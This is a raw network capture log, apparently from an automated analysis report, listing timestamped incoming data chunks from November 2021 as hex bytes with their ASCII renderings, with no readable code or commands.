                                                                                                                                                                                2021-11-11 11:26:50 UTC7450INData Raw: 5b 96 49 ab fe f6 3b 27 32 6c 75 ca 60 aa b3 67 52 56 7d 2f e5 28 05 18 ff e7 fe f7 65 ce 0b 1c 21 ad fe ec 5a 75 f6 02 c5 13 62 14 09 0b 7f ee 36 0b a5 a8 69 7e 7f 38 8a 01 10 b7 fb ea e9 55 89 00 75 cc cb 5a 38 f7 fe 12 33 3e be e2 6d 92 dc 5e 26 0b 3a 19 af 0e 75 c5 81 96 59 d8 e2 ef 0b c6 3b c8 20 59 fc 47 01 d9 f5 d9 3f c9 fd 65 89 26 94 4f c5 64 30 84 90 af ac 71 c0 f1 88 cb 80 e3 bd 42 45 dd 6c 9e 9d f8 ef 4b 1a dd 1e 28 83 f2 03 99 ea 1f 8b 6a b0 45 d5 47 1f b4 b3 af ac 8d f2 1b d7 f9 b0 4b 53 be 98 1f e0 3e f3 27 e0 27 14 d7 5e 1a a8 f0 b2 d9 42 3c 1c 65 4b 05 34 e8 ea e8 e6 a0 e2 96 37 00 22 74 3e f7 47 11 52 c2 07 f4 3a 68 66 c8 80 29 b2 93 19 a0 60 a6 b1 00 9c 1c 0d fa 99 50 fb e3 0e e9 85 1d 37 1d 4f 01 77 fc 05 11 fc c4 aa a6 77 7b 2d 96 01
                                                                                                                                                                                Data Ascii: [I;'2lu`gRV}/(e!Zub6i~8UuZ83>m^&:uY; YG?e&Od0qBElK(jEGKS>''^B<eK47"t>GR:hf)`P7Oww{-
                                                                                                                                                                                2021-11-11 11:26:50 UTC7455INData Raw: 4d d2 01 76 c1 32 96 1d 9e 80 38 7d 0d 3a 6f da c2 32 11 b6 78 92 d8 e5 70 07 36 a2 cd 68 74 30 69 21 20 b7 45 15 9c 8c 05 0f 8f 9f 40 ea a5 71 36 29 0c e0 3b 60 84 18 5a 1a c3 c4 4e 07 20 a8 fd bb a3 18 0c 9e bd 84 a2 50 c1 18 1c f8 a9 78 98 58 2b 2d 40 a0 29 3f 6a 8c 12 67 fe a3 e8 13 38 ee 97 d6 20 41 e9 69 1a cb 1d 6c 44 87 81 04 bf 7f a6 63 59 c6 96 ba 64 6d ff f4 20 21 ed 3f 99 41 28 81 81 29 c6 09 d2 60 72 ba bf 74 4c eb dd b8 00 3b b9 bf db ee b1 75 ea 2d 6a bc a4 a1 2b 3a 73 24 17 31 f8 fb 4e 83 05 b3 39 7b 26 65 44 55 33 5d 38 9b d7 f9 aa 4e e2 9f 82 09 f2 b8 75 fe ea 52 5d 73 0d 09 21 3b 88 e4 9d 5a 3a 4c 5c 09 42 09 f0 f0 c4 3e 03 11 1e f1 63 9e de 9f ee bb a5 b9 c5 dd af fa e4 bd 50 5b bf 6e 6e 90 bb b3 5c 25 1a 8d 1a e5 77 9a 30 dd 09 5a cc
                                                                                                                                                                                Data Ascii: Mv28}:o2xp6ht0i! E@q6);`ZN PxX+-@)?jg8 AilDcYdm !?A()`rtL;u-j+:s$1N9{&eDU3]8NuR]s!;Z:L\B>cP[nn\%w0Z
                                                                                                                                                                                2021-11-11 11:26:50 UTC7459INData Raw: f3 d5 27 03 0b e3 db 67 af c0 6d a2 75 98 50 d7 cc a6 75 58 e4 c1 32 a7 67 b3 2a 16 b5 ea da 2f 5f eb 60 6c fe 0e 9c 95 b4 b3 9d d4 26 ca 4e 32 ae 1f 4a 4f 5d 96 ff 95 d3 c3 93 10 fe 2e 64 80 bb 87 a1 cc 65 b7 cc 33 25 01 18 e6 b7 1e b1 f4 be ee e8 59 e2 7e 62 9f ea 75 dc ef 52 d9 f2 8b f0 30 c1 76 04 3f 75 12 ea 38 7f f8 b5 7a 78 b5 6c 0e 91 f2 8b f6 80 ee 18 70 35 8a 44 52 95 ff 3a 12 28 6a cd 12 b8 ff 2d 34 2b f6 fa 2b 09 3a bd 2a c9 71 9e 4a 29 6e 47 c0 45 c2 64 ec 8c c9 33 48 39 8c 71 16 d9 57 62 a6 1b 26 ee 9f 65 e9 8d 9b 7b 09 74 c1 f6 fe 59 ca 3a e9 08 d7 fa 99 9d 19 bc 6a d9 97 04 19 be 16 fe e2 85 2d 2d d6 53 53 ff 04 08 dd e4 6f b8 20 4b 35 e0 12 a5 ee 98 22 80 9c c9 53 4b 7e ca dd 12 35 80 62 c1 f1 9a be ff 63 6c 85 f8 b6 a1 8b 1a 3e eb 65 86
                                                                                                                                                                                Data Ascii: 'gmuPuX2g*/_`l&N2JO].de3%Y~buR0v?u8zxlp5DR:(j-4++:*qJ)nGEd3H9qWb&e{tY:j--SSo K5"SK~5bcl>e
                                                                                                                                                                                2021-11-11 11:26:50 UTC7463INData Raw: ec 18 a1 31 d7 3a d8 6e db 97 89 67 77 73 f8 13 fb 62 8f 09 85 cc f7 ef d8 82 f8 62 2b 3b 29 d7 ff f1 73 a7 59 0c 4d 4c 3b 70 39 01 16 25 95 5f 14 d5 82 84 ff 31 38 ce 7a 9c 54 06 b0 cb 4b 65 35 5c ef c4 5e ea b8 f2 a6 94 fe d0 e8 c8 4e bb aa 29 f2 14 80 fd 54 d2 e9 b2 41 95 2f bd a4 3d 2d 5a dd 92 71 83 2e 28 43 e7 a6 84 50 e3 2c 25 b9 99 92 ee 17 1e aa 75 80 aa c1 8b f3 28 6b 29 ac fa f5 14 20 bd bb 0d c2 f1 d7 d1 a9 09 31 51 50 0f ec f7 4a 1f f3 32 16 23 13 17 8d ba de d9 27 18 b8 71 2b 1a 9d f1 16 60 18 7e 1c 07 85 81 29 50 c0 c3 10 2a 17 28 2d 27 2a e3 91 97 22 24 cf a9 d7 7b 55 96 25 fa 2d b7 3a e8 2f d3 13 36 e7 16 12 01 d9 a3 f8 13 31 c1 d9 7d 6e 32 34 c9 57 14 28 9e 2b bf 4a fe 2d 59 28 5e d5 b6 4f 8b 3b 11 c6 b3 5e ac 18 3d 36 2f e9 ce fe 5b 7d
                                                                                                                                                                                Data Ascii: 1:ngwsbb+;)sYML;p9%_18zTKe5\^N)TA/=-Zq.(CP,%u(k) 1QPJ2#'q+`~)P*(-'*"${U%-:/61}n24W(+J-Y(^O;^=6/[}
                                                                                                                                                                                2021-11-11 11:26:50 UTC7467INData Raw: ae eb 40 8a f7 6c a1 b7 89 0a fb 64 b4 aa ed 92 c2 36 09 ca 5e 15 62 21 da 5d 1a db ff 58 d9 4e ef bb 2c df ea 9f c5 ea 83 89 fb 2b 31 8e 74 25 c2 1f f9 b8 4d 0c 36 50 4f ae 9d c6 6e 74 bf 84 91 ee e3 7f 76 26 21 33 c9 35 1c ba 09 d2 f2 f3 50 b8 4b fd 82 ca c1 3d 2d 7c e8 84 ff 21 ca ff 64 16 f8 f1 81 01 f0 29 c9 3c 1e c4 8b 38 8a 7a 48 07 5f cd de de f6 05 12 ca 24 5d ee 75 e2 ab cd 91 72 1f 2e 01 f7 0f ca 8b f3 64 2f f8 e2 96 be 82 70 80 d1 2a 49 fc 8d 52 f5 d1 e9 a7 5f 16 a9 40 06 c0 50 1b 38 6a 03 f2 49 b7 9c 59 16 80 1a 0d 7b 0a 2a f5 af ae a8 83 bf df fd 18 38 7a 6c 09 d9 a7 d2 0b 1a fe 9b 78 01 7f 12 d1 34 0a ea e7 72 93 be 2c 25 71 16 40 79 08 e2 d0 2d bb cf ea 97 08 9c 8a ff 4e 30 b8 a4 70 82 32 35 5d 4b a4 d2 e7 d7 96 37 95 75 8b bc 5f ba 73 db
                                                                                                                                                                                Data Ascii: @ld6^b!]XN,+1t%M6POntv&!35PK=-|!d)<8zH_$]ur.d/p*IR_@P8jIY{*8zlx4r,%q@y-N0p25]K7u_s
                                                                                                                                                                                2021-11-11 11:26:50 UTC7471INData Raw: ce e3 23 48 c8 4a d8 b5 ce b8 63 9f 52 c3 ff 3f ec 86 c9 e8 57 8f c9 84 31 d6 ab 94 da fa cb cc 5e 16 64 e7 6b 2f 59 55 1b 98 92 c6 98 16 c7 0e d7 45 16 bf bf 13 9c ac ef 2c 28 8b e8 e1 49 51 42 cb 50 f4 4b e9 aa 74 f8 84 f9 bb ac 49 76 ff 3a 92 62 05 55 5e 28 59 f7 3e cb ae 5b ee 29 e4 09 21 f5 0b 2e 2d 09 61 f4 28 b4 d2 94 ea b8 1d b1 31 f8 4c ab 33 4e 1f d8 21 02 c3 33 eb 18 ef fa 64 62 6f 53 02 8b 29 f8 14 0a 29 21 f1 89 8e 09 1f 45 c9 2d 12 43 ec 7e 2f e3 d3 bb 32 3b c6 d5 c9 dc c9 2a a2 e6 cb cf 99 b4 da 6f 05 bd 1a 2d d8 41 31 5a d0 e2 0d 8b df 5f ba 29 42 27 d9 8e 4b d7 ba 5f 09 8b 74 4f 59 c1 08 01 7c 11 4a e3 71 1b 8b 31 7a ec d2 a5 eb 9a 34 4b 89 53 2a f8 97 b3 0e c8 0f 12 bd 65 18 78 e9 f6 40 d6 aa 41 92 c9 0f 85 12 62 d9 81 f7 d3 21 19 91 45
                                                                                                                                                                                Data Ascii: #HJcR?W1^dk/YUE,(IQBPKtIv:bU^(Y>[)!.-a(1L3N!3dboS))!E-C~/2;*o-A1Z_)B'K_tOY|Jq1z4KS*ex@Ab!E
                                                                                                                                                                                2021-11-11 11:26:50 UTC7475INData Raw: c8 77 45 d0 a8 07 c9 f7 d5 70 9d 56 1f 66 2f ba 16 ca 5b ea b6 92 4c 69 4f 29 dd 6c 81 92 ef 2c e6 f3 aa 5c 7d c6 55 98 76 5a ba a6 eb 29 f2 a8 8b d2 21 05 70 37 98 f6 31 ed 2b 31 cd 9d d2 7f 99 61 6f 57 bf 8a 83 4f 37 27 e5 03 9c 6d 0a 88 8a 1a a1 c2 01 2f b3 2d a6 ef 95 5d b6 44 9f 51 bc 17 c3 b6 05 2d ef 7d 14 e3 bf 1a e2 62 96 ff cc 66 97 5e 0a 12 04 ca c8 11 b9 01 4b be 11 fc 29 cb b9 dd 6c 88 e1 7b dd 9a 7a 4a 4c 28 7f 64 7d 45 21 f9 27 65 84 d6 a6 dd 97 cd 14 7e ed fe 92 16 8a dd 2d 6f bc dd dd ad e2 64 7d 9b 9a da c3 79 f3 89 8b 33 89 26 f8 06 25 f1 1c e7 6d 0e 09 da d3 f7 88 22 04 2d 31 d0 de 78 1d 1f 12 f9 13 bc ca d3 65 54 2d ff b6 52 92 be b7 23 4a cf 3a 4a fa 95 f9 ab c4 12 a8 b3 ad 82 34 30 01 e6 89 f7 f2 9f b5 ab be d1 1c 25 d7 1c 85 5c 4c
                                                                                                                                                                                Data Ascii: wEpVf/[LiO)l,\}UvZ)!p71+1aoWO7'm/-]DQ-}bf^K)l{zJL(d}E!'e~-od}y3&%m"-1xeT-R#J:J40%\L
                                                                                                                                                                                2021-11-11 11:26:50 UTC7479INData Raw: a5 00 37 01 ee ff 36 9d fe 27 0a 9c 55 cf 0d 3c 29 01 f2 41 09 07 b9 2a d8 bd eb bf 74 7c d0 8a 0a 96 e6 69 77 71 d9 79 03 c3 84 60 5e 89 31 86 f1 6e fc fb a2 03 94 ad 29 2b 01 77 4d 7b 2f b9 df 5a aa 68 ba 0f 20 b7 01 9f 66 a9 b5 88 c7 b8 24 a3 13 9c 01 81 5d cb 78 62 3f 78 bc 11 85 12 5e bd 13 d3 ff cd 58 2b a3 f6 5b b2 8b 13 b2 86 04 3d 21 f1 fe b7 9e 5a b2 dc d3 8c 9e 20 4d 11 64 d3 eb 64 a5 c5 03 e6 90 12 09 de aa b7 6a 48 95 5b 28 5a 2d 94 be 69 4a 62 5d 54 e7 72 51 30 a7 88 d1 82 26 ed e5 e1 ee 2d bb 38 df c4 c1 80 24 ff cc 26 d2 5e 09 01 4b f8 8f cc 63 3f e9 1c da 47 d5 f3 74 ac 31 a5 96 32 b6 aa 49 fe 25 09 89 fa 76 fb c5 c9 05 30 01 f3 bb a3 43 31 33 84 29 d7 2e d8 39 df d7 5a b2 60 9f 4b cf bf 38 24 c1 24 84 54 0d 14 09 5c f1 d1 17 21 c9 ed db
                                                                                                                                                                                Data Ascii: 76'U<)A*t|iwqy`^1n)+wM{/Zh f$]xb?x^X+[=!Z MddjH[(Z-iJb]TrQ0&-8$&^Kc?Gt12I%v0C13).9Z`K8$$T\!
                                                                                                                                                                                2021-11-11 11:26:50 UTC7482INData Raw: 77 5a 41 40 7a e5 9c 68 4a d6 04 e0 05 b3 bb 28 fe 01 5a f1 dd e4 07 b3 c7 df a4 e7 a2 bc 90 c4 5f a7 17 5e a6 54 4a 81 f7 f6 80 2e 99 61 e2 f4 0b 51 be 2f e8 09 b2 f1 46 33 24 31 fb 04 69 57 05 c4 cb ef 8e 0f 4b a3 d6 00 ea e6 d9 6f 2b 09 f1 dd 86 13 cb 64 64 a4 54 1c ae 42 bd 5b ca 16 de b3 32 4b f0 b4 e2 9f dc 69 e9 77 41 b5 f3 4b f7 46 f3 56 be 14 89 d3 9a 39 21 49 ec 96 12 3b c2 f3 d0 f5 ec 1b 51 30 ce 7f ec d3 e4 ea f2 64 96 12 b1 12 68 8d 59 31 a9 3f cd e9 e1 d2 3a a6 71 25 07 d9 72 a5 f7 93 68 4c a4 b0 b5 aa b7 5b 6a 30 f4 e9 46 1c bf d9 ae 8c 3f 31 90 e2 5b 1c dd e1 6b 99 aa 45 25 dd 4f 3e 49 e5 c0 d5 fb ab 0a 21 f6 ec c4 35 cc e5 df 9d 94 7f f0 af 89 33 85 52 ee 35 20 f2 8d 89 bf f9 be 48 d9 0b 09 1e c2 52 d9 0e 49 a9 c1 f1 b0 49 71 f8 8a 01 ca
                                                                                                                                                                                Data Ascii: wZA@zhJ(Z_^TJ.aQ/F3$1iWKo+ddTB[2KiwAKFV9!I;Q0dhY1?:q%rhL[j0F?1[kE%O>I!53R5 HRIIq
                                                                                                                                                                                2021-11-11 11:26:50 UTC7487INData Raw: 61 5b 32 f0 1f 5d 59 4a 68 a9 66 2b 25 70 0e 95 45 fc 90 2b 4b ee 89 d6 05 1d ea 53 c8 14 f2 44 37 9c 3d b0 a2 7d 6e 14 b7 ba 6f 6c f9 eb 44 13 a1 06 0c 3f 13 88 8a 07 c5 64 3c c3 84 e7 65 b8 cd 2a 6e 13 8f cd 0e 6e 13 95 0b d0 1f df b6 61 be 33 2d 45 d4 12 32 16 14 f9 b1 d6 b2 17 5b ce 15 4a eb 32 62 d6 5d 82 46 f3 73 b2 e2 df e2 c3 79 62 97 01 eb 61 b9 09 f6 ea ff 51 d6 a0 f0 25 29 c6 66 a0 f4 1b b7 6c 71 b5 92 22 d7 62 86 5c 71 69 5d 5a 57 94 56 4f 09 fb f7 51 4b 47 4f 0b d3 f5 a5 0b 78 5b 57 af 1a 41 55 78 36 e9 2b 2d 35 3b be 64 51 f3 20 16 c2 06 8a 6b 5f fb 0e 55 de 46 d6 01 04 6b eb 89 5b c0 8d b1 68 ee 3f 29 cd 77 23 5a a0 6b f7 58 1f 03 a1 28 0e 28 bd d6 84 cf f9 e0 d2 bf b0 f8 c2 4b b3 2c 03 cb 9e cf 6b 70 27 9f f4 60 2d 96 c8 4e f7 8d b9 38 af
                                                                                                                                                                                Data Ascii: a[2]YJhf+%pE+KSD7=}nolD?d<e*nna3-E2[J2b]FsybaQ%)flq"b\qi]ZWVOQKGOx[WAUx6+-5;dQ k_UFk[h?)w#ZkX((K,kp'`-N8
                                                                                                                                                                                2021-11-11 11:26:50 UTC7491INData Raw: c9 88 47 d9 b4 5a 42 03 10 60 2c 82 a2 13 9b 33 bb eb 99 d1 55 74 ba 53 8d 82 8c 7d 7e 6b 50 09 c8 fc f3 4f 28 28 27 31 fd 6a f6 37 25 c0 54 d2 97 e6 76 e3 bd 94 1e c4 d7 ab 8d 99 6a c2 f5 f9 dd c6 2e 29 ea 05 b9 c2 09 f3 5f 9a 81 d2 58 45 05 3f 98 59 3a 25 31 c9 f7 cc a0 5f eb 8b f5 4b ef d5 aa af 16 4d ab 72 14 be 7d d9 de 4b 71 eb 09 21 d1 d7 ee 19 5b 1c 29 43 7f a1 f8 3e ab 74 c8 ba 8c 58 ce 5f 40 cb 15 5f aa 32 58 2b 75 62 05 55 c2 5c 7e b1 52 d0 22 95 45 ba 08 ee 04 89 03 13 f7 94 e0 95 77 14 95 b4 61 42 31 d1 92 27 d7 ec ed 0b 63 eb 6b 1b f4 b2 5a dd db 38 af 69 3b 2e 3b ff 31 f2 d9 05 44 63 a8 95 00 ea bf 91 55 6e 01 c0 b9 54 6f 71 12 21 d7 aa 12 21 bd 3c 80 ba c5 2c 40 2e 9a 5d 51 20 08 7f dd 5e 3c ce d6 b3 7b 25 c7 5e 0b c4 e9 ba a3 ed 49 a5 2f
                                                                                                                                                                                Data Ascii: GZB`,3UtS}~kPO(('1j7%Tvj.)_XE?Y:%1_KMr}Kq![)C>tX_@_2X+ubU\~R"EwaB1'ckZ8i;.;1DcUnToq!!<,@.]Q ^<{%^I/
                                                                                                                                                                                2021-11-11 11:26:50 UTC7495INData Raw: 56 0f 62 29 c0 35 f7 28 71 21 4a ce fa 9c 2f 31 4e 1f d9 24 3b f6 9d 54 69 e1 97 de f5 52 0b b4 dd 65 f5 93 f1 ab a3 4c 03 2e 74 1c 9d 29 8f 89 75 f9 fa a5 58 34 9f 76 b4 c9 79 18 91 1f 5b e1 f2 2f e8 55 4a 70 ef 29 c9 8b 9e 3d 6b 75 4c 35 d7 bc bf 8e 45 38 03 fe 4e c1 32 9f 2d 82 5b 89 f3 94 8d 9f d3 d4 13 fb ff 39 e2 3c d0 c3 ff 09 06 93 d7 4b c6 8d 47 2a b2 67 4a 17 bf f9 f4 85 cb 80 12 22 e8 26 7e 95 65 b0 92 c3 34 b7 ed ec 54 fe 3e e1 3b 77 7f e5 31 ad 05 c8 e2 49 32 4a d7 fb 93 47 66 94 3e af 35 e5 be c2 93 f3 75 96 c6 5f 7d 8d d7 6f 74 51 8c fb 03 5e 3b ac 21 b4 98 99 04 95 c5 f7 2d bb 68 f3 22 ff 22 3c 62 c6 30 2d 31 d1 76 bb c1 eb 29 f2 2e f3 e5 50 8d 3b 9e 2d c9 d7 9a b3 d6 06 ad 7d b8 c2 01 c7 b6 5a 16 31 a8 5f df 2f 5c 62 c8 36 82 31 c2 89 ce
                                                                                                                                                                                Data Ascii: Vb)5(q!J/1N$;TiReL.t)uX4vy[/UJp)=kuL5E8N2-[9<KG*gJ"&~e4T>;w1I2JGf>5u_}otQ^;!-h""<b0-1v).P;-}Z1_/\b61
                                                                                                                                                                                2021-11-11 11:26:50 UTC7499INData Raw: 4d a8 61 7a 66 4a 11 bf 79 1f e1 39 3b 71 ae 33 3b eb 2c 9a f3 95 89 eb 20 3a ea 5d 94 90 5b 35 8f 73 5e cc ea ee b9 25 c5 c2 06 48 01 ff 04 27 29 df 62 d1 77 cc e0 4a f7 eb cb 30 12 e9 b8 aa 8b ce 5b b3 39 09 de 89 c8 55 e5 9e 8b 09 d7 fe 9f 60 33 19 89 d2 95 40 44 e7 28 ae d0 bd 54 c4 52 0b e8 d1 fa bc 25 ce 32 75 55 a9 d7 75 53 62 96 f2 eb 8a db 2d be 7c 88 58 21 1f 5f bf e3 62 8b c7 b1 8c 31 ad c2 dc 85 2e 22 c2 d0 be a4 7e c2 ae a1 36 21 e4 7a e6 8a 4e 34 c0 a0 01 c1 4b 48 ca d1 4a bf 32 61 f8 d6 cf 4f 72 ee 13 64 fc b9 b2 bf f7 f9 8b e9 ff 16 d4 25 09 1e 76 64 ea 61 01 b9 60 0c df 79 fd e8 7a 8a 64 4c 9e d2 a8 ef 13 85 27 e1 ff 31 f6 00 dc b8 2f 57 9d 7c 37 09 3b 9c d5 ee 0d 4e 0e ad 76 b5 ab f3 59 97 fb 9d c5 7b d8 2c 33 b1 44 a7 f9 12 72 77 c5 43
                                                                                                                                                                                Data Ascii: MazfJy9;q3;, :][5s^%H')bwJ0[9U`3@D(TR%2uUuSb-|X!_b1."~6!zN4KHJ2aOrd%vda`yzdL'1/W|7;NvY{,3DrwC
                                                                                                                                                                                2021-11-11 11:26:50 UTC7503INData Raw: f5 e1 bd e5 d7 93 31 bb 64 f0 fa ec 39 2f eb e5 80 09 01 d3 d4 00 50 e6 7f 03 52 99 5a 6a 09 05 a0 7c 96 e9 1c 1a 5c 21 3a 98 12 93 0b 8b 23 40 18 a4 1d 5e fe ff ef f7 96 c0 4c 7d 84 e0 03 6d 4c 26 fa 4b 37 2d 79 b4 60 52 0d a1 1e 9d 74 42 cb 75 89 98 d5 5b 77 e7 07 0e 10 e1 8f 02 cb 84 bf 2d e0 69 9a d9 53 36 65 fb 69 30 c5 89 fa f8 93 c1 31 f8 29 f2 44 bd ab bd 7d d9 a8 e7 7f a2 83 c5 2b 13 c5 d4 a3 83 5a c8 e3 21 16 f0 31 c6 ea 72 52 af f6 67 49 50 e4 69 c0 d5 56 58 29 3e 4b c6 c4 4b 16 fb d9 18 ad ef d6 ac ef a5 e9 80 e2 9c 8b be 5e 79 58 09 f7 b5 cc b4 9f 5c 51 3e 5f ee 29 52 6b 09 3c d1 5d c2 b8 5f 07 11 11 0e 17 e9 f6 90 c7 d4 5c 01 9d 57 e3 50 05 1f 59 9a 29 13 25 cf 5c 78 e7 be 0b 45 ef 05 66 01 17 af 1c 6e 25 14 2f 82 bf 59 39 89 21 db 73 a8 04
                                                                                                                                                                                Data Ascii: 1d9/PRZj|\!:#@^L}mL&K7-y`RtBu[w-iS6ei01)D}+Z!1rRgIPiVX)>KK^yX\Q>_)Rk<]_\WPY)%\xEfn%/Y9!s
                                                                                                                                                                                2021-11-11 11:26:50 UTC7514INData Raw: c4 54 9c c1 4b ca a5 5f 12 61 ab f6 28 0b eb 21 0f d5 36 14 97 89 6f 55 f9 2a 65 ee d9 54 ca 7d d9 e7 92 29 c4 90 a9 c5 d7 ae 75 f1 ae b3 0a d2 c4 db ec a6 b4 8c be d0 b6 e3 16 d8 ac 12 2a 2d 2c 4d c1 fc 99 ca 31 3c 37 8b 05 c5 5d 92 e8 64 ab 05 a9 21 d3 f3 0b 5f ef 29 25 31 8e 7a b2 08 9e 24 a8 64 cf b1 82 2c db a4 ef d8 f2 33 71 31 7c cf 25 ef 40 51 8b c4 31 eb e8 a5 a1 27 3d ed cc 3f e5 17 39 15 d3 45 1d e7 01 8f 4d 2b 19 0c a7 56 6e 2f 54 03 51 ee 17 a4 10 a2 b4 93 a1 3d 29 de 2a 12 0b 97 d8 98 8c 68 bf 56 23 2f 54 68 e2 33 11 57 de bb 56 04 37 94 b8 26 33 68 75 9d 76 8d c0 c8 5b bb 5d b5 65 cf 0b 29 13 75 b1 a7 ef 1c de 97 d4 f0 89 c7 19 51 c5 4c 1c 01 b7 d8 fd 49 36 78 d6 33 ca 21 2f 23 3f 78 b2 58 c2 5a e7 e7 ef 2f d3 86 3c 24 97 7f 14 36 25 89 f0
                                                                                                                                                                                Data Ascii: TK_a(!6oU*eT})u*-,M1<7]d!_)%1z$d,3q1|%@Q1'=?9EM+Vn/TQ=)*hV#/Th3WV7&3huv[]e)uQLI6x3!/#?xXZ/<$6%
                                                                                                                                                                                2021-11-11 11:26:50 UTC7519INData Raw: 29 c0 bb 1e 20 b5 bd 74 26 25 57 ee 6b 85 8a bf 2d 01 14 0e b7 e0 9c c1 05 9f 1a 8e fc eb c9 75 ba 13 f7 c6 06 17 da 33 0e 10 c9 a5 c4 09 cf bd 61 4e ec 06 b1 01 0a 2a dd 38 04 4e bb 88 a3 2d 91 bf 96 0b 98 42 ea 9f e4 f4 7c 09 ff 38 e6 46 27 4f 0b 0e ce 74 12 50 89 f6 9f 54 13 4b 00 a2 21 fe 8b 1a 9f b2 bd f7 02 06 09 f0 5f e5 d7 02 e1 e9 5f 8e f8 76 18 76 da 16 0a 53 2c 40 02 11 48 a5 63 17 87 19 8a 09 2f fb 7d 29 68 d5 59 d1 a1 36 09 39 03 f4 86 e9 f0 24 99 b1 48 c6 21 c4 b4 c8 ae fc a8 a7 c5 f3 eb 2d c5 12 da c9 7d e5 69 a4 1f 20 a7 b5 f3 79 12 f8 ba e3 25 85 89 d1 bb 62 87 e1 12 5d 02 26 09 db 7d 9a 76 fc 73 2f ec cd 97 ff 96 9c 9c 14 4f c4 f9 33 b9 d3 dd bc 25 f7 f1 e3 48 b2 c2 29 c7 7d c1 52 cb 3f a1 b4 2b cb a9 59 cd 85 35 40 fc 05 a4 cc 25 31 bd
                                                                                                                                                                                Data Ascii: ) t&%Wk-u3aN*8N-B|8F'OtPTK!__vvS,@Hc/})hY69$H!-}i y%b]&}vs/O3%H)}R?+Y5@%1
                                                                                                                                                                                2021-11-11 11:26:50 UTC7535INData Raw: 31 06 b4 b3 c4 ce ba e7 46 76 64 21 18 eb fe 28 c9 f7 70 3b 2f 4a 4e 74 a5 2f 14 6c 2e 21 fe a8 e9 30 bc ee 28 9d ec c6 ff 2b fe 28 5e e6 a4 fd 5b 29 f8 de 74 74 c6 6b d6 60 f5 a9 c6 f6 46 af 14 c3 4a f9 ef 29 d3 7f fc fb b4 ee da 41 4b ae 21 a5 21 fa 2b e9 46 d6 f8 a6 82 29 c2 66 fd f3 82 34 42 ae e8 9f a2 01 09 1a 15 c2 67 5f ec 70 8a 1c df 62 ec 32 d2 62 b3 41 7c 29 6a c2 12 80 7f 39 a4 35 66 ab 4e ea 35 2f ba 32 de e6 5d 4c 4d 98 dd b1 d7 6b 74 ad c5 09 d8 f7 35 b7 73 6a 09 f7 80 79 f8 49 fe 9f 16 c2 8c fa 12 9e 9b e9 5a 63 bf ec 75 25 33 13 54 b8 6a 09 2b f2 2d 78 82 69 f6 4e d5 ec 06 09 01 13 31 c0 7d 92 10 f9 ba 42 0d 01 e5 77 28 f3 2b 35 40 4c 26 db 27 5b eb 2d 0b d1 14 a0 45 b8 23 b5 2a 05 58 5a c8 ed 5d de 3a d9 f0 8c c0 56 0d 4e 28 8a 92 16 31
                                                                                                                                                                                Data Ascii: 1Fvd!(p;/JNt/l.!0(+(^[)ttk`FJ)AK!!+F)f4Bg_pb2bA|)j95fN5/2]LMkt5sjyIZcu%3Tj+-xiN1}Bw(+5@L&'[-E#*XZ]:VN(1
                                                                                                                                                                                2021-11-11 11:26:50 UTC7546INData Raw: 6f b8 77 f7 e9 df d9 87 cf c8 ee a7 54 02 93 f6 a8 28 b7 e9 df b0 9d 89 fe 9f 5c cb 6d 8e 6a d8 b5 fe a6 3d 24 c7 0d cf 52 f7 39 da 0a 6e 83 47 de 1f 0e 1f be e7 51 85 6b c2 9a 5e 00 62 09 fe 71 4a af 89 d8 29 21 77 16 ee d2 40 12 6f 61 c2 33 1f 2f 63 f6 ee cc 45 21 c8 fb f2 fa 93 ea 2d ae 3a e2 d0 c5 29 df 80 ae 21 1e 31 95 f4 ad e9 c6 b6 94 85 01 26 f0 97 22 39 3d 96 4d e1 c9 48 b2 84 7d 9a 6c 59 b0 89 01 fe dd c6 7d 9d d8 08 9e e8 6b fd 92 1c 51 1a c9 57 8b 6f b8 f4 31 3e 99 ca 42 2b 1e 59 b7 96 09 57 8b bc fb 4a 38 5e f7 97 16 2a b5 31 d6 d9 af 94 4c 15 5e 05 cb 5b 27 d7 ff 1e ba 5d 01 ab d3 ab f2 ef 92 fe 32 34 f1 ff 71 f9 49 f9 2c 93 ef 61 fe 09 c9 73 fb 75 bd c5 ec 82 89 d0 29 37 5d fc 8c 62 cb 2d f7 d1 e4 ce dd 42 f8 3f 8b 37 e6 41 2d 21 c0 9a b2
                                                                                                                                                                                Data Ascii: owT(\mj=$R9nGQk^bqJ)!w@oa3/cE!-:)!1&"9=MH}lY}kQWo1>B+YWJ8^*1L^[']24qI,asu)7]b-B?7A-!
                                                                                                                                                                                2021-11-11 11:26:50 UTC7562INData Raw: d7 21 69 2a 9c 69 21 69 f9 36 8b 50 32 04 dd 89 73 d7 46 ee 97 71 18 69 d8 f8 4f d6 af 67 bc a5 f6 17 1f fa ce 2a 58 48 d7 fb 31 a8 f1 33 3b cc 67 0d 4b 28 e2 df d3 ae 75 0e fe 34 de b3 9f 26 e9 f4 61 c8 33 1e 6b b7 37 40 bb 21 f5 3d 6d 87 d8 01 29 ec 22 42 1e 8c 21 24 07 7d 2a 27 96 11 d5 6e f4 4a 13 f7 91 43 bf 4b 84 ed ac 4a cb be 58 95 97 94 51 90 02 02 d5 b5 0c 68 29 d9 fd ce e7 8b 2b ba c0 51 60 8a 31 c6 3f a5 5e 44 2f 9c e5 43 7d 78 79 22 13 39 d7 70 ba b3 84 25 10 d3 42 25 7f 49 81 d1 3a 8f 7a 5e c8 ca 0f dc 3e a5 f7 6e e0 bf 5b cc a7 7e ab 6c 60 66 17 35 07 f2 5f e3 81 d3 6e 39 53 21 ad 92 58 ca 9d fe e9 52 5c 7c 3c 4a fb 8a 6b 04 01 ca 29 d2 a3 30 48 af 4b ae cc 68 1f 9c 5d 6b 5d cc d5 48 b3 68 a5 ba c2 5f e2 b2 de c6 84 69 e9 76 59 cb a5 57 0f
                                                                                                                                                                                Data Ascii: !i*i!i6P2sFqiOg*XH13;gK(u4&a3k7@!=m)"B!$}*'nJCKJXQh)+Q`1?^D/C}xy"9p%B%I:z^>n[~l`f5_n9S!XR\|<Jk)0HKh]k]Hh_ivYW
